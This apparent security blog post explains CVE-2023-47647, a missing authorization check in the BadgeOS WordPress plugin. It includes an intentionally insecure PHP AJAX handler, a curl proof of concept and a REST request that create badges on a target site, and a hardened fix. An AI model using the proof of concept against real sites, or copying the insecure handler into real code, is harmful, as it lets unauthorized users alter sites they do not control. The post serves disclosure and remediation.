CVE-2023-47647 is a high-severity security flaw found in BadgeOS, a popular WordPress plugin used to create achievement systems on websites. This issue, running from uncertain earlier versions through 3.7.1.6, could let almost anyone perform restricted operations—without proper verification—if the plugin’s access controls are incorrectly set up.

In this post, I’ll break down how the vulnerability works, why it’s dangerous, and how attackers can use it. There’s also a step-by-step sample exploit and links to original references.

What Is CVE-2023-47647?

This vulnerability exists due to missing authorization, or “broken access control”, in the BadgeOS plugin. In simple words, the plugin failed to verify that the current user is actually allowed to perform certain tasks, like creating or editing achievement badges, before carrying them out.

Impact:
With this bug, attackers can use specially crafted HTTP requests to perform administrative actions. If your site has users with low-level permissions (like contributors, students, or guests), they might trick the system and grant themselves badges, create new ones, or worse.

Affected Versions:

- All BadgeOS versions up to and including 3.7.1.6
- The vulnerability might also exist in earlier, unlisted versions (the “from n/a” part).

Technical Details

The main risk comes from endpoints (AJAX actions or REST API routes) that don’t check if the current user has the required permissions.

For example, an endpoint like /wp-admin/admin-ajax.php?action=badgeos_save_badge is supposed to be used by site admins only. But in faulty implementations, any logged-in user—or even a guest, depending on setup—can call this endpoint and perform privileged actions.

The code should have had current_user_can() or similar strict checks, but often didn’t.

Here’s a simplified, non-malicious example of the bad code:

```php
// Example: insecure handler for saving a badge
add_action('wp_ajax_badgeos_save_badge', 'badgeos_save_badge_callback');

function badgeos_save_badge_callback() {
    // MISSING: if( !current_user_can('manage_options') ) { ... }
    // (no nonce check either, so the request is not tied to a form the user loaded)

    // Request parameters are used as-is, without any capability check
    $badge_title = $_POST['badge_title'];
    $badge_content = $_POST['badge_content'];

    // Save badge as new post type
    $badge_id = wp_insert_post([
        'post_title'   => $badge_title,
        'post_content' => $badge_content,
        'post_type'    => 'badgeos_badge',
        'post_status'  => 'publish'
    ]);

    echo json_encode(['status'=>'ok', 'badge_id'=>$badge_id]);
    wp_die();
}
```

What’s missing?
There’s no permission check (current_user_can(...)). So anyone who can make an AJAX call can create badges.

- Craft a request: the attacker sends an HTTP POST or GET request to the insecure endpoint.
- Perform unauthorized actions: for example, create a new badge, edit existing ones, or trigger achievement logic, compromising the integrity of the system.

Sample Exploit (Proof of Concept)

You need an account on the website, but even low-privilege accounts usually work. Here’s a way to add a new badge via curl:

```shell
curl -k -X POST 'https://target-site.com/wp-admin/admin-ajax.php' \
  -d 'action=badgeos_save_badge' \
  -d 'badge_title=Hacked+Badge' \
  -d 'badge_content=You+have+been+hacked'
```

If the endpoint is unauthenticated, just this POST request adds a badge!

If the plugin allows it via REST, something like this can work (using an API tool like Postman):

```text
POST /wp-json/badgeos/v1/badges
Authorization: Bearer <low-privilege-user-token>
Body: { "title": "Hacked Badge", "content": "Awarded by attacker" }
```

Real-World Example

A student on a learning site could send a malicious request and award themselves an "Expert" badge, skipping all intended checks and undermining the integrity of the achievement system.

On some sites, badge creation or modification can also have SEO or reputational impacts.

Fix and Recommendations

- Update Plugin: Upgrade BadgeOS beyond 3.7.1.6 (see the latest version changelog).
- Patch Checks: Ensure every sensitive handler checks current_user_can('manage_options'), or an equally restrictive capability, before acting.
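Here is how the insecure handler shown earlier could be hardened, as an added example written for this post and not taken from BadgeOS itself: the capability check is the fix recommended above; the nonce check and input sanitization are standard WordPress AJAX practice added here, and the nonce action name `badgeos_save_badge` is an assumption.

```php
<?php
// Added example (not BadgeOS code): hardened version of the badge-saving
// AJAX handler. The action name and the 'badgeos_badge' post type come from
// the insecure example above; the nonce action name is an assumption.

// Registered only for logged-in users: with no wp_ajax_nopriv_ hook,
// admin-ajax.php answers guests with "0" and never reaches the callback.
add_action('wp_ajax_badgeos_save_badge', 'badgeos_save_badge_callback_secure');

function badgeos_save_badge_callback_secure() {
    // 1. CSRF protection: the request must carry a nonce minted for this
    //    action (wp_create_nonce('badgeos_save_badge')); dies with 403 if not.
    check_ajax_referer('badgeos_save_badge', 'nonce');

    // 2. Authorization: the capability check the vulnerable handler lacked.
    //    manage_options is granted only to administrators by default.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Insufficient permissions'], 403);
    }

    // 3. Input validation: reject missing fields and sanitize the rest.
    $title   = isset($_POST['badge_title'])
        ? sanitize_text_field(wp_unslash($_POST['badge_title'])) : '';
    $content = isset($_POST['badge_content'])
        ? wp_kses_post(wp_unslash($_POST['badge_content'])) : '';

    if ($title === '') {
        wp_send_json_error(['message' => 'badge_title is required'], 400);
    }

    // 4. Perform the privileged action only after every check has passed.
    $badge_id = wp_insert_post([
        'post_title'   => $title,
        'post_content' => $content,
        'post_type'    => 'badgeos_badge',
        'post_status'  => 'publish',
    ], true); // true: return WP_Error on failure instead of 0

    if (is_wp_error($badge_id)) {
        wp_send_json_error(['message' => $badge_id->get_error_message()], 500);
    }

    wp_send_json_success(['badge_id' => $badge_id]);
}
```

Every wp_send_json_* call terminates the request, so a failed check can never fall through to wp_insert_post().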

References

- Original CVE Entry: CVE-2023-47647
- BadgeOS Plugin Page
- Patchstack Advisory
- Detailed Report (patchstack.com)

Final Words

CVE-2023-47647 is a classic example of the damage possible when developers forget to double-check user permissions. Even trusted plugins with big user bases can have simple, critical bugs.

If you run BadgeOS, patch your plugins and check your users’ activities. Security is everyone’s job—even if you’re only earning badges.

*Need to check your plugins for vulnerabilities? Try tools like WPScan or Patchstack to keep your WordPress site safe!*

Timeline

Published on: 01/02/2025 12:15:16 UTC